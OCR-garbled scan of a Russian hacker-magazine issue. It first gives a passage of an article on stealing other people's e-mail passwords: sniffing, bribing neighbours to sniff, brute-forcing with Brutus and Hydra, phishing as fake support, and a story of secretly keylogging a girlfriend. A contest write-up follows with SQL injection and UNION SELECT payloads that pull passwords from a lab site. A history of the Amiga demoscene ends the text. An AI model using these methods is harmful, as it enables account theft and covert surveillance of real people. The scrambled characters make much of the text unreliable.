чаю новый мыльник и подсматриваю пароль программой ореп- 
разз либо ра55ѵіе\л/. Этот изящный прием я несколько раз практи- 
ковал во времена РРС-эпидемии, когда было очень легко попасть 
на нужный компьютер. Поэтому вышеописанный прием я исполь- 
зую только тогда, когда четко знаю, что в машине есть серьезный 
баг и нет настроенного файрвола, который может помешать. 

[нюхаем пароли] Из заголовка ты, наверное, догадался, что 
речь пойдет о сниферах. Действительно, отснифать почтовый 
пароль вполне реально. Нужно лишь выбрать хорошее место 
для запуска нюхача. Это может быть как компьютер из текуще- 
го сегмента, так и маршрутизатор, через который проходит 
весь трафик жертвы. 



[хакер 04 [76] 05 075 ] 




[хакер 04 [76] 05 076 ] 




[ІСОЗпіІІ — лучшее решение для локальных сетей] 

Мне удается этот фокус, даже если я не подключен к локальной 
сети нужного провайдера. 

Делается это следующим образом: каким-либо способом я нахо- 
жу диапазоны ІР-адресов, принадлежащие провайдеру. Затем 
сканирую сегмент, в котором находится жертва. После этого про- 
биваю ІСО-номер или е-таіі любого жителя сегмента (координаты 
легко можно найти через домашнюю страницу юзера, которая 
часто располагается на его компьютере). После всех этих шагов 
необходимо договориться с кем-нибудь за пиво, чтобы человек 
отснифал необходимый пароль. Либо, если чувак пуленепробива- 
емый, у него можно стрясти контакты другого чувака из этого же 
сегмента и попробовать поговорить с ним. В моем случае у меня не 
раз получалось доставать таким образом пароли, причем свое 
согласие на это давал примерно каждый третий юзер сети. Не са- 
мая большая цена за е-таіі — пара бутылок дрянного Клинского :). 
Что касается маршрутизатора, тут все обстоит сложнее. Чтобы 
добиться желаемых результатов, необходимо поломать крупный 
роутер и установить на нем снифак. В теории этот способ прост 
как два рубля, но на практике он практически невыполним :(. Уж 
слишком хорошо защищены эти маршрутизаторы. 

[возьми его силой!] Пришло время рассказать про излюбленный 
всеми метод — атаку брутфорсом. С одной стороны, этот способ 
почти всегда применим для любых почтовых систем, но с другой, 
вероятность успешного взлома ящика крайне мала. Думаю, не 
стоит говорить почему :). 

Однако, несмотря на это, брутфорс применяется повсеместно, и 
мне не раз доводилось подбирать пароли к ломаемому аккаун- 
ту. Итак, что же необходимо, чтобы получить пароль от ящика этим 
способом? Здесь можно пойти несколькими путями в зависимос- 
ти от обстоятельств: 

И Использовать софт под \Л/іпсІо\л/5. Хорошим брутфорсером для 
РОРЗ-аккаунтов была и остается софтина Вгиіиз2, написанная в 
далеком 2002 году. С помощью брутуса можно легко перебрать 
огромные листы с паролями. Многопотоковая технология позволит 
ускорить процесс в десятки раз (при хорошем канале, конечно). 
\ 2 \ Использовать софт под І_іпих. Более рациональный вариант, так 
как юзание забугорного шелла более экономично. В этом случае 
можно воспользоваться софтиной Нубга либо написать свой пере- 
борщик. Перебирать пароли, например, на ІіоіппаіІ.сот и 
уаііоо.соіп непросто, поскольку на этих сервисах отсутствует дос- 
туп по РОРЗ/ІМАР. Выход из положения — написание самопального 
брутфорсера. У меня в хакерском арсенале имеется рабочий че- 
кер аккаунтов ІіоітаіІ.сот. Превратить его в брутфорсер не соста- 
вит большого труда. Если ты заинтересовался этой программой, 
скачивай для ознакомления перловый исходник с моего сайта. 

[напоминаем клавиши] Прием заключается в использовании кей- 
логгера с целью украсть чужой почтовый ящик. Не нужно путать 
этот способ с протрояниванием, потому как здесь применяется 
только кейлоггер и ничего больше. Иными словами, на компьютер 
устанавливается клавиатурный шпион, который отсылает все дан- 
ные на почтовый ящик либо хранит их в отдельном файле. Для пол- 
ной ясности картины я приведу пример взлома с помощью просто- 
го кейлоггера Иоокбитр. Мой хороший знакомый захотел узнать, с 
кем переписывается его девушка. Поскольку дама была не слиш- 
ком наивной, так просто она ему пароль не говорила. Сложность 
была в том, что девушка не подпускала парня к ее компьютеру. Бо- 
ялась, наверное :). Так вот, мой корефан установил на своей маши- 
не программу Поокбитр, известную как клавиатурный шпион, а 
затем пригласил подругу в гости. Они распили бутылку вина и за- 
тем сели за компьютер. Внезапно девушка захотела... нет, нею, что 
ты подумал :). Она захотела проверить свою почту. Товарищ, дабы 
не смущать даму, удалился заваривать чай. За время его отсут- 
ствия девочка проверила почту. После ее ухода мой знакомый уз- 
нал о даме много нового, а именно то, что у нее очень много как 
виртуальных, так и реальных бойфрендов, помимо него. Это очень 
обидело парня, и он разорвал с ней все отношения. Вот так кейлог- 



гер может уберечь людей от случайных связей :). 

Этот случай произошел два года назад. Тогда еще не было хоро- 
ших шпионов, которые без глюков отсылают все данные на хаке- 
рскую почту. Теперь же таких программ пруд пруди. Так что ра- 
зумнее всего незаметно подкидывать прогу на компьютер жерт- 
вы, а затем ждать писем. Либо действовать методом от противно- 
го, как делал мой гениальный товарищ. 

[моя профессия — социальный инженер] Наконец мы подошли к 
самому интересному и до конца не изученному способу — соци- 
альная инженерия. В нашем случае эта инженерия направлена 
на то, чтобы всеми возможными и невозможными способами выу- 
дить пароль у пользователя ящика. Здесь также существуют свои 
тонкости. Во-первых, нужно обладать даром красноречия. Во- 
вторых, взломщик и жертва должны каким-либо образом контак- 
тировать. Как я уже говорил, самый распространенный способ 
кражи — отправка сообщения якобы от техподдержки сервиса с 
просьбой выслать пароль. Иначе, мол, заблокируем твой аккаунт 
к чертовой матери. И юзеры велись. И возможно, до сих пор ве- 
дутся. Здесь главное — правильно убедить :). 

Не обязательно вымогать пароль напрямую. Как-то раз я втерся в 
доверие к человеку, а затем безвозмездно предложил ему почто- 
вый ящик на звучном домене. Когда пользователь согласился, я 
спросил у него логин и пароль. И что ты думаешь? Жертва сказа- 
ла пароль, который совпал со всеми остальными! 

Если же эта затея не удалась, можно попробовать поставить прок- 
си/сокс на зарубежном шелле, поделиться доступом с жертвой, а за- 
тем сразу включить на сервере снифер и отловить все нужные пароли. 
Можно бесконечно долго расписывать приемы выуживания пас- 
свордов. Но основная мысль состоит в том, что здесь главное не 
повторяться, не использовать избитых методов, и тогда любой 
пользователь попадется на эту удочку. 

[поиск по интернету] Еще одним успешным приемом взлома является 
поиск по различным сетевым базам. Рассмотрим пример: допустим, 
мне захотелось взломать любой ящик в домене росіопок.ги. Я захожу 
на уапсіех.ги и вбиваю в строку поиска имя нужного сервера. Тут же 
всплывают ссылки, указывающие на красивые адреса типа 
гооі@расІопак.ги и т.п. Один из таких адресов прикреплен к пользова- 
телю гооі, который зарегистрирован на каком-то ламерском форуме 
рИрВВ. Естественно, что версия форума не такая уж и новая :). Я без 
проблем сломаю такую борду и упру хэш пароля юзера гооі. После 
этого, воспользовавшись Мсібіпзісіе, я расшифрую пароль жертвы. 
Проверки показывают, что этот пассворд, конечно же, совпадает с 
паролем на мыло! Или не совпадает — тут уж как повезет :) © 




[успешный брут пароля] 



[ГДЕ ДЕСЯТЫЙ ПРИЕМ?!] 

Напрягая все извилины мозга, я не мог придумать 
достойного приема номер десять. Поэтому поручаю 
это тебе. Если у тебя есть идеи, которые хакер может 
применить против вражеского мыльника, направляй их 
в мой почтовый ящик (только не стоит его ломать, 
укушу :)). В знак благодарности я обязательно 
поделюсь моими соображениями на этот счет. 




о 
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ЕСЛИ ТЫ ДОЛГО ЛОМАЛ ГОЛОВУ, 

НО ТАК И НЕ СУМЕЛ ПРОЙТИ НАШ ПРОШЛЫЙ КОНКУРС, 
РАССКАЖУ, КАК ЭТО НУЖНО БЫЛО ДЕЛАТЬ I Игнак 

ака ВЬэоЭеХ (ЫоосІѳх@гѳаІ.хакѳр.ги) 




[первый этап] Этап первый. Заходишь в сутенер-интерфейс по 
адресу ѵіеѵѵ.рІір?1 : іІе=осІтіп. Тут нужно было догадаться, что 
ѵіеѵѵ.ріір инклудит файл осітіп.іпс. Так как іпс — не рНр, то он не 
прогоняется через интерпретатор, и можно без проблем про- 
честь его исходники. Если ты неплохо разбираешься в рНр, при 
наличии исходников ты сообразишь, что, введя логин диезі и 
пасс диезТ, попадешь в сервис для сутенеров-гостей по адресу 
ѵіе ѵѵ.ріір ?Я1е=ас1пп . Так как абт ничем не хуже абтіп, то исход- 
ники асіт.іпс тоже читаются без проблем. В полученных исход- 
никах сидит злостная бага, при помощи которой, обратившись 
по адресу ѵіе ѵѵ.ріір ?ЯІе=сісІт&Іодіп=&8ісІ=, ты попадаешь в пол- 
ноценный сутенер-интерфейс, в котором можно получить инфу о 
любой девочке. 

[второй этап] Здесь нужно сделать простую зді-инъекцию: поле с 
паролем оставляешь незаполненным, а в качестве логина вво- 
дишь ЫаЫаЫа' ог Іодіп='_логин_чела_аккаунт_которого_нуж- 
но_спереть'/*. И таким образом заходишь под этим самым логи- 
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ном. Меняешь е-таіі на свой. Теперь, если ты накупишь таблеток 
на сумму большую, чем у тебя есть на счету, то тебе на мыло выш- 
лется письмо, начинающееся со слов «Уважаемый _логин_». Если 
поменять в куках переменную зісі на ЫаЫаЫа' ІІІМІОІМ ЗЕІ_ЕСТ разз, 
'0', '0' ЕРОМ изегз ѴѴНЕРЕ Іодіп = '_логин_Ѵ* , то тебе на мыло при- 
дет письмо, начинающееся со слов «Уважаемый _пароль_». 
[третий этап] В прошивке робошлюхи присутствует іпі-едег-пере- 
полнение, через которое ты можешь сделать свой долг перед ней 
равным нулю. Также можно переполнить строку, затерев пере- 
менную внутреннего денежного баланса, и сделать его больше 
$1000. В этом случае она пойдет домой к мафии на смазку, 
[четвертый этап] Заключается в следующем. Заводишь два аккаун- 
та и логинишься под одним из них. Будем называть зісГом название 
каталога, в котором находятся скрипты для управления личным 
счетом. ЗісІ определяет аккаунт. Если ввести в инфе о пользовате- 
лях внешнюю переменную га^с/е/, равную с//ел/з/_$/с/_, то пхп вы- 
даст ошибку, в которой говорится о том, что іпІо.ІхГ не является фай- 
лом. Так ты узнаешь о существовании файла іпІо.ІхГ, в котором за- 
писано следующее: «_зісІ_;_имя_;_фамилия_;_номер_счета_». Об- 
■сгги внимание на то, что все эти данные разделены символами «;». 

Ітобы получить на счету $10000, делаешь покупки на эту сумму и та- 
ким образом получаешь задолженность в -$10000. Далее меняешь 
номер счета для аккаунта на счет второго заведенного тобой ак- 
каунта, изменив свою фамилию, допустим, на Пупкин;_номер_сче- 
та_второго_аккаунта_. Теперь удаляешь все покупки из корзины и 
видишь, что в балансе счета сверкает циферка 10000. 

[ну а теперь о новом конкурсе] Если ты регулярно участвуешь в 
наших хакерских соревнованиях, то наверняка заметил, что все 
ломаемые скрипты были написаны на РНР. Но ты же понимаешь, 
что одним РНР настоящему хакеру не обойтись, ему еще нужно 
знать такой полезный скриптовый язык, как РегІ. Бороздя беск- 
райние просторы Сети, ты можешь увидеть, что РегІ использует- 
ся в современном мире не так уж редко. Но прежде чем ломать 
такие крупные проекты, работаЮщи^тагпЩЖовке, как таіі.ги, 
стоит проверить, сможешь ли ты похаксорить действительно 
бажный регі-сайт, такой как ѵѵѵѵѵѵ.росіопок.ги. Дерзай! Будешь 
первым — возьмешь приз @ 
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ПОМНИТСЯ, КОГДА У МЕНЯ В СЕРЕДИНЕ 90-Х 
БЫЛ СПЕКТРУМ, В 2Х-ПРЕССЕ И ДЕМКАХ ПО- 
СТОЯННО ПОДНИМАЛИ ШУМ ВОКРУГ КОМ- 
ПЬЮТЕРА АМИГА. ЛОЗУНГ «АМІОА — ВІІІ_Е2, 
РС — ЗІІХ» ПРОНИКАЛ ПОВСЮДУ, А СЦЕНЕ- 
РЫ ПРИВОДИЛИ ДЕСЯТКИ АРГУМЕНТОВ, ПО- 
ЧЕМУ АМИГА ЛУЧШЕ ПИСЮКА. ТОГДА Я 
ПРАКТИЧЕСКИ НИЧЕГО НЕ ЗНАЛ ОБ ЭТОМ 
КОМПЬЮТЕРЕ, ПОМНЮ ТОЛЬКО, ЧТО ХОТЕЛ 
ЕГО БОЛЬШЕ, ЧЕМ РС, ТАК КАК ВСЕ ГОВОРИ- 
ЛИ: «АМИГА — ЭТО КРУТО». НА ПРОТЯЖЕ- 
НИИ 90-Х ГОДОВ АМИГА БЫЛА ЭЛИТАРНЫМ 
КОМПЬЮТЕРОМ, КОТОРЫЙ МОГЛИ СЕБЕ ПО- 
ЗВОЛИТЬ НЕМНОГИЕ. НАМНОГО ОПЕРЕЖАЯ 
СПЕКТРУМ ПО МУЛЬТИМЕДИЙНЫМ ВОЗМОЖ- 
НОСТЯМ, ОН ДАВАЛ СЦЕНЕРАМ ТО, ЧТО НЕ 
МОГ ДАТЬ РС. СООБЩЕСТВО АМИЖНИКОВ 
ПРЕДСТАВЛЯЛО СОБОЙ СПЛОЧЕННЫЙ, 
ДРУЖНЫЙ КЛУБ, В КОТОРОМ АМИГУ НЕ ПРО- 
СТО ЛЮБИЛИ, ЕЙ ПОКЛОНЯЛИСЬ. И БЛАГО- 
ДАРЯ СВОИМ ВОЗМОЖНОСТЯМ, КОМПЬЮ- 
ТЕР КАК НЕЛЬЗЯ ЛУЧШЕ СПОСОБСТВОВАЛ 

ТВОРЧЕСТВУ I тіпс1\л/0гк (тіпсІ\А/Огк@датѳІапсІ.ги) 




х 

2 



История и реалии 
амижного сообщества 

[краткая история Амиги] История Амиги на- 
чалась в 1982 году, когда в небольшом ка- 
лифорнийском городке Лос-Гатос группа 
инженеров во главе с Джеем Майнером 
объединилась с целью создать совершен- 
но новый компьютер. Не клон Арріе, не оче- 
редной спектрум... Амига, как ее окрести- 
ли создатели, обещала стать самой мощ- 
ной и функциональной персоналкой. В ос- 
нове лежала революционная архитектура 
— в отличие от всех остальных компьютеров 
того времени, процессор Амиги выполнял 
только вычислительные операции, в то вре- 
мя как графикой и звуком управляли отдель- 
ные чипы. Также Джей Майнер с коллегами 
решили первыми реализовать в персональ- 
ном компьютере многозадачность. Тогда 
на это были способны только многомил- 
лионные мейнфреймы от ІВМ и ЭЕС. 

За год инженеры сделали большую часть 
работы. К ноябрю 1983 года в лаборато- 



рии «Хай-Торо» (так называла 
себя группа разработчиков) 
Ж| Щ? на нескольких столах была 

ИІ 1 1 установлена хитрая конструк- 

Щі I I ция, в которой к печатным пла- 

там были прикреплены три 
главных сопроцессора, а в 
центре возвышался мозг ком- 
пьютера — самый мощный из 
существующих на то время процессор Моіогоіа 68000. Несмотря 
на громоздкость, все это отлично работало. Следующие нес- 
колько месяцев Джей Майнер и компания доводили свое детище 
до ума и пытались вместить все детали в корпус персонального 
компьютера. Все это время разработка Амиги велась тайно, так 
как наверняка нашлась бы толпа желающих спионерить револю- 
ционные идеи. Для отвода глаз «Хай-Торо» занималась производ- 
ством экзотических джойстиков самых причудливых форм и раз- 
меров. 

В начале 1984 года разработчики решили, наконец, познакомить 
мир с «подружкой». Презентация состоялась на выставке Сопзи- 
тег ЕІесігопісз в Чикаго, и для демонстрации возможностей свое- 
го компьютера программисты «Хай-Торо» написали программу 
Воіпд ВаІІ, в которой по экрану летал объемный клетчатый шарик, 
отскакивающий с характерным звуком от стенок. Добиться тако- 
го качества изображения не удавалось ни одному персонально- 
му компьютеру, так что Амига была принята с шумом и восторгом. 
Одновременно с достигнутым признанием закончились деньги раз- 
работчиков, и они стали искать инвестора, который мог бы поддер- 
жать перспективный проект. Арріе, Зііісоп ОгарПісз, РНШрз, НР, Зопу 
— все эти компании остались равнодушными к предложению Джея 





Майнера, а президент Аіагі, согласившийся купить акции фирмы, 
предложил слишком уж смехотворную сумму. Погрязшая в долгах 
«Хай-Торо» рисковала обанкротиться, и на этом история бы закон- 
чилась. Но ситуацию спасла компания Соттосіоге, купившая за 
приличные деньги все права на Амигу, давшая работу ее авторам 
и выделившая 27 миллионов долларов на дальнейшие разработки. 
23 июля 1985 года на коммерческой презентации в Нью-Йорке го- 
сти смогли по достоинству оценить возможности Атіда 1000. Про- 
цессор 7,14 Мгц, 4096 цветов, 256 Кб ОЗУ, четырехканальный сте- 
реозвук, многозадачная ОС, дисковод, мышь — на фоне восьми- 
битных спектрумов и С64 Амига смотрелась королевой бала. Но 
стоимость в $2000 не позволяла ей стать по-настоящему популяр- 
ной. И в 1987-м Соттосіоге выпустила две новые модели: недо- 
рогую Атіда500 и хай-эндовую Атіда 1000. 

Именно с появлением доступной Атіда500 началось триумфаль- 
ное шествие Амиги по всему миру. 

[этапы амижной демосцены] Первые попытки творчества на ком- 
пьютере Атіда начались в 1988 году. Большинство сценеров в это 
время обитали на Соттосіоге 64 и только начинали перебирать- 
ся на новую платформу. Особенно много было крак-групп, кото- 
рые регулярно проводили сору-пати и обменивались свежим ва- 
резом и кряками. 

Одной из первых амижных дем, заслуживающих внимание, стала 
Оеппопз аге Рогеѵег от О.О. С. А Сгаскег Зоигпаі, выпущенный в ян- 
варе 1988 года, стал первым амижным дискмагом, за которым в 
этом же году последовали три других. Чуть позже кодер Зосіап из 
Дании зарелизил первую коммерческую игру, написанную сце- 
нером, — $\л/огсІ о? Зосіап. 

Большинство работ с 1988 по 1989 год были экспериментальными 
и копировали идеи из с64-интрух. Никто на самом деле не знал, 
как именно нужно делать демы. Поэтому настоящим откровением 
для сценеров стал релиз Медабето от группы Реб Зесіог, в кото- 
рой имелась шикарная для своего времени графика, музыка и 
впервые ощущался дизайн. Особенностью этой демы было то, 
что она состояла из нескольких частей, подгружаемых отдельно. 
Каждая часть имела свою музыку и эффекты. 

В 1990 году группа Зсоорех выпустила свое известное трекмо Меп- 
іаі Напдоѵег, в котором части не подгружались, а следовали одна 
за другой под непрерывную музыку. Такой подход был более дина- 
мичным, и сценеры позаимствовали его в своих последующих ра- 
ботах. МН также ввело моду на векторные эффекты, и практически 
все демки этого и следующего года были основаны на векторах. 

В 1991 году стартовали два крупнейших фестиваля компьютерно- 
го искусства ТИе ѲаіПегіпд и ТИе Рагіу, Лучшие группы Амиги вы- 
ставили на них свои работы, и когда на ТИе Рагіу демка Обуззеу от 
АІсаігаі опередила по баллам Нагб\л/ігеб отТИе Зііепіз, споры, ка- 
кая из них на самом деле была лучшей, продолжались несколько 
месяцев. Также примерно в это время на сценовых бордах нача- 
лась паника, подогреваемая сплетнями. Как стало известно, по- 
лиция арестовала за фрикинг сисопа известной сценовой ВВЗ Ра- 
габізе, а вскоре после этого закрылась еще одна популярная 
борда Вогб Роуаі. Многие стали опасаться ареста, так как дер- 
жали на своих досках нелегальный софт. Но потом все утихло, и 



закрытые ВВЗ снова стали работать. 

Следующий 1992 год открыл новых талантливых сценеров. Реііесі, 
Апбготеб, ЗрасеЬаІІз — работы этих групп быстро получили 
признание, заняв призовые места на демопати. А шведская Эіді- 
іаі ІІІизіоп выпустила тем временем легендарную игру РіпЬаІІ Эге- 
аітіз, которой переболел каждый амижник. 

Представленный в 1993 году чипсет АСА для Амиги позволил делать 
графику лучшего качества и в скором времени стал новым стандар- 
том. Благодаря этому улучшилось качество амижных работ в це- 
лом. Во второй половине года демосцена получила целую кучу ин- 
тересных, зрелищных демок: ІЧехиз 7 от Апбготеба, Моііоп: Огідіп 2 
от ВотЬ, РзусНебеІіс от Ѵігіиаі Эгеатз, ЗоиікіісНеп от ТНе Зііепіз, 
ѴѴНаттег ЗІаттег РеЬеіз'ов, ТНе Ргеу от Роіка ВгоіНегз и другие. 

В 1996 году некоторые амижные звезды стали перебираться на 
РС, так как к тому времени он уже превосходил возможностями 
Амигу. Демки Іпзібе и Сопігазі привнесли в РС бетозсепе новые 
идеи и отличный дизайн, их авторами были амижники. 

1997 год выдался одним из самых активных в истории амижной де- 
мосцены. Год, когда о себе заявили новые талантливые группы 
НаиіоЫэ, МеІІо\л/ СГіірз, когда выпустили свежие релизы старички, 
давно не радовавшие сцену (Зсоорех), когда количество шикар- 
ных работ исчислялось не единицами, а десятками. Но с одной 
стороны, став пиковым в истории амижной демосцены, этот год 
стал началом большого спада, не прекращающегося по сей день. 
В дальнейшем работ для Амиги будет выходить все меньше, в ос- 
новном они будут заточены под крупные демопати с целью вы- 
игрыша. А авторами будут крупные коллективы, уже давно став- 
шие известными. 

[легенды Атіде зсепе] История Атіда зсепе — это в первую оче- 
редь история групп, способных своими работами вдохновить ты- 
сячи людей на творчество. За прошедшие 16 лет на Амиге рабо- 
тало много звездных команд. Я расскажу о двух из них, без кото- 
рых вряд ли можно представить историю амижной сцены. 
Зсоорех 

Изначально австрийская группа, основанная двумя парнями Рап- 
дег и ЗГюгк іГю Мазіег. Произошла из Медаіогсе (МРС) — извест- 
нейшей С64-команды, на демках которой выросли многие С64- 
сценеры. В 1988 году у Медаіогсе на почве крэкинга появились 
проблемы с полицией, и Рапдег, будучи лидером, решил, что 
группе лучше залечь на дно. Но так как парень был в душе сцене- 
ром, и тяга к творчеству давала о себе знать, в том же году он от- 
крыл новую группу, имеющую амижную демонаправленность (хо- 
тя с пиратством ребята и не завязали окончательно). Большинство 
мемберов МРС перешли в Зсоорех, присоединилось несколько 
талантливых новичков, и вскоре группа под лозунгом «Ѳепегаііопз 
АРіеаб» («Впереди поколений») приступила к активной работе. 
Среди первых релизов были такие демки, как І_аіег ПдРіі, Сіогу 
Зіагз 1,2, ХепотогрГіз. И поскольку в 1988 году программ под Ами- 
гу, а тем более демок было немного, группа сразу завоевала вни- 
мание. Но настоящий успех пришел к ней в 1990 году, когда Зсо- 
орех выпустила Мепіаі Напдоѵег. Это была действительно рево- 
люционная вещь, изменившая все представление сценеров о 
том, как должны выглядеть амижные демки. До МН основу амиж- 
ной демосцены составляли мегадемы, состоявшие из нескольких 
отдельно подгружаемых частей. В работе от Зсоорех эффекты 
шли непрерывной чередой под одну музыку, и все действие на 
экране было синхронизировано со звуком. 

Весь следующий год Зсоорех была лучшей амижной демогруп- 
пой, пока сценеры из РНепотепа не зарелизили Епідта, первую 
демку, сместившую МН с первой строчки чартов. Через некото- 
рое время ЗІау- 
егл$соорех объявил 

0 разработке сикве- 
ла Мепіаі Напдо- 
ѵег'а — демки ѴѴогісі 

01 Ѵобка. Но, несмо- 
тря на большие ожи- 
дания сценеров, 
несмотря на то, что 
она стала одной из 
самых известных 
дем еще до своего 
рождения, выйти ей 
было не суждено. 
Следующие нес- 

[амижники на демопати Вгеакроіпі] колько лет актив- 
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[Джей Майнер демонстрирует чип Амиги] 



ность группы была слабой. Все помнили ее работы и до сих пор 
считали выдающейся командой, но в амижной прессе стали по- 
говаривать о скорой кончине. В 1994 году к Зсоорех присоеди- 
нился один из лучших художников демосцены Мабе, и в 1995 году 
группа ожила, выпустив несколько нашумевших релизов: демки 
Агісоге и СуЬегіа, слайдшоу Мэйда, трекмо 130, интро на 40 Кб 
7его Огаѵііу 2, продолжая радовать сцену своими работами 
вплоть до 2002 года, выставляя их на разных пати и практически 
всегда занимая призовые места. 

ЗрасеЬаІІз 

В 1989-м, когда совсем еще молодой парнишка, называющий себя 
Эагк Неітеі, решил создать новую группу, он даже мечтать не мог, 
что через несколько лет ее возведут в культовый статус десятки тысяч 
демосценеров во всем мире. Тогда это была просто ЗрасеЬаІІз — 
группа, состоящая из одного человека и неизвестная никому, кроме 
ее основателя. В том же году к группе присоединился 15-летний про- 
граммист І_опе Зіагг, который впоследствии стал таіп сосіег'ом и од- 
ним из самых известных программеров на амижной демосцене. За 
ним последовали Маіог АззПоІе, ѴодПигі, Ргезісіепі 5сге\л/, Ѵіппіе — 
все эти ребята были из одного города Хальден, так что они могли 
встречаться и обсуждать свои проекты в любое время. 

Дебют ЗрасеЬаІІз состоялся в 1990 году на демопати СгуріоЬиг- 
пегз, где была выставлена демка Зразтоіуііс. Работа была основа- 
на на трехмерном векторном движке, полностью написанном І_опе 
Зіагг. Конечно, все были поражены, что такой малец мог написать 
что-то, что работало быстрее и лучше, чем вещи более взрослых и 
известных кодеров. В группе не было ни одного художника, но, нес- 
мотря на это, Зразтоіуііс и несколько следующих работ поражали 
воображение сценеров за счет великолепного кода и идей. 

В 1991 году демка ѴѴауіагег от ЗрасеЬаІІз заняла первое место на 
одном из крупнейших демопати ТПе СаіПегіпд. По-настоящему из- 
вестной группа стала после релиза своей культовой демки Зіаіе 
оі іПе Агі, где для передачи танца девушки использовался тоііоп 
саріиге наряду с новыми визуальными эффектами. Дема, которая 
сделала историю, настоящая классика для всех поклонников 
Амиги. Амижники полюбили ее сразу, и первое место на ТПе Рагіу 
было вполне закономерным. Следующие работы: 9 Ріпдегз, МоЬіІе 
Эезііпаііоп 11пкпо\л/п, ТНе І_азі Ріпдег — только укрепили успех, и 
многие талантливые демосценеры (Раппу, ЗирегЫао, Расеі ШіагсІ 
и др.) оставили свои группы, чтобы присоединиться к ЗрасеЬаІІз. 
Триумф ЗрасеЬаІІз длился недолго. Основные мемберы группы 
вскоре устроились на работу, и времени на сцену и творчество у 
них не осталось. І_опе Зіагг, Эагк Неітеі, затем РгезісІепсІ 5сге\л/ и 
другие стали по очереди покидать группу, занявшись разработ- 




[фрагменты из легендарной Зіаіе оі [скриншот из демы 9 Ріпдегз от 
Іііе АП] ЗрасеЬаІІз] 



кой компьютерных игр. В 1997 
году произошла реорганиза- 
ция ЗрасеЬаІІз, во время кото- 
рой к ней присоединилась ку- 
ча новых людей. Но новая ко- 
манда была лишь отголоском 
той легендарной ЗрасеЬаІІз, 
какой ее запомнили сценеры. 




ШрУ/шш.атібетоз.огд — 
крупнейший архив амижных 
демок. 

ШрУ/аба .ріапеі-б.пеі — 
здесь можно скачать 
лучшие демы, тщательно 
отсортированные. 
ШрУ/агізсепе.ІехбіІез.сот/Ш 
зіогу/зсепегу/зсепегу — 
подробнейшая история 
демосцены на Амиге (на 
английском языке). 
ШрУ/ашіда.огд.ги — 
информационный центр 
Амита в России. 
ШрУ/ашііобау.зрЬ.ги — 
амижные новости. 
ШрУ/ті/і. бод та . огд. иа — 
электронное амижное 
издание. 



[амижное движение в России] В 

то время как в остальном продви- 
нутом мире Амига становилась 
все популярнее, в России ее 
распространенность была силь- 
но ограниченной. Причин тому 
было несколько. Для начала, вы- 
сокая цена: если приличный 128- 
килобайтный спектрум с диско- 
водом и звуковым чипом можно 
было купить за 50 баксов, мини- 
мальная цена на Амигу составля- 
ла $500. Собрать на коленке, в отличие от того же 7Х, ее тоже не пред- 
ставлялось возможным из-за отсутствия микросхем и закрытой архи- 
тектуры. Также не было практически никакой информации об этом 
компьютере на русском языке. Было много небольших групп поклон- 
ников Амиги, рассыпанных по всей территории СНГ, но обмена опы- 
том и постоянного общения между ними практически не наблюда- 
лось. 

В профессиональном плане Амигу использовали работники ка- 
бельного телевидения, создавая на ней зрелищные презентации 
с помощью специальных программ. Более-менее доступным для 
простых смертных компьютер стал с 1993 года. Его покупали те, 
кто хотел чего-то помощнее спектрума. У большинства людей по- 
сле покупки Амига выполняла функцию игрового компьютера. 

До 1995 года активность амижников была невелика. Софт можно 
было достать только в крупных городах. Жители провинций стали 
потихоньку налаживать связи друг с другом и периодически об- 
менивались посылками. Была даже такая специализация — 
з\л/аррег. Эти люди занимались тем, что коллекционировали про- 
граммы и обзаводились контактами по всей стране с целью об- 
мена. У крупнейших з\л/аррег'ов коллекции софта превышали те, 
что имелись у продавцов в амижных точках. Впрочем, часто своп- 
перы как раз и были продавцами. 

Одной из самых ранних русских групп, делавших что-то на Амиге, 
была СосІеЬизіегз. Уже широко известная спектрумистам по де- 
мам Заіізіасііоп и сотням кракнутых ими игр, она ломала защиту 
лицензионных амижных геймух и распространяла их с фирменны- 
ми интрохами. Первой же демосценовой командой стала І_оокег 
Ноизе, работы которой появились в 1996 году. 

Довольно бурными на протяжение 90-х были войны амижников и 
писишников. Аргументом первых были яркие демки, игры с потря- 
сающей графикой, мультимедийные возможности и атмосфера 
преданности и дружелюбия, которая царила в их сообществе. 
Вторые утверждали, что все эти достоинства меркнут по сравне- 
нию с главным недостатком — софт для Амиги хрен достанешь и 
поддержки от разработчиков практически никакой. В то же время 
программы для РС можно было купить чуть ли не на каждом шагу, 
стояла только проблема выбора. В 1994 году компания Соттобо- 
ге обанкротилась, и права на дальнейшие разработки Амиги пла- 
вали от одной фирмы к другой. Каждая из них обещала поклонни- 
кам платформы фантастические перспективы, но время шло, и ни 
одно из обещаний не было выполнено. Наконец немногие остав- 
шиеся профессиональные разработчики ПО устали ждать пере- 
мен и ушли писать софт на РС. За ними последовали и многие 
амижные сценеры, которых еще недавно почитали все амижники. 
А теперь возненавидели. В дискмагах появилось множество ста- 
тей, проклинающих «предателей», и воззвания поддержать Амигу, 
так как счастливое будущее «не за горами». Но чем дальше, тем 
более становилось очевидно, что они только уговаривают себя. 

В конце концов оставшиеся немногочисленные ряды русских 
амижников смирились с тем, что РС одержал верх, и прекратили 
сражаться, а вместо этого следили через инет и фидо за развити- 
ем событий и иногда писали маленькие программки. 

К концу 90-х амижная демосцена пережила еще две войны. Первая 
была с польскими сценерами, которые выпускали свою продукцию 
на родном языке, в то время как все требовали от них понятного ан- 
глийского. Свежих релизов к этому времени уже выпускалось на- 





столько мало, что на счету была каждая новая дѳмка и игрушка. А тут такая языковая дискри- 
минация. Вторая война была противостоянием двух амижных операционных систем Атіда- 
034 и МогрЬОЗ. 

Сейчас основным местом общения амижников является ІРС-канал #атідаги5 на серве- 
ре ТогезТпеТ.огд и форумы на амижных порталах, например Іііір://атідо.огд.ги/1 : огипп. 
Хотя разговоров об амиге сейчас ведется уже намного меньше — все постоянные посе- 
тители друг друга знают и просто таким образом поддерживают связь. 

[интервью с ребятами из І_оокег Нои$е] Имхо, будет лучше, если о ситуации на россий- 
ской амижной демосцене расскажут люди, имевшие к ней непосредственное отноше- 
ние. Поэтому я связался с парнями из группы І_оокег Ноизе, которые на протяжении 
90-х принимали в амижной жизни активное участие и выпустили легендарный дискмаг 
Іпзотпіа. На мои вопросы согласились ответить ѲЭМ и ХРЕН. 
тіпсІ\л/Огк: Какими вам, парни, запомнились первые годы Амиги? 

ѲйМ: Впервые Амига появилась в Москве, купить ее можно было в одном из двух ком- 
пьютерных клубов, ранее продававших Атари и С64/128. Амига позиционировалась как 
дорогой и очень качественный игровой компьютер. Фактически бум начался с А600, а 
чуть позже — А1200. А500 была больше распространена на Западе и до появления 
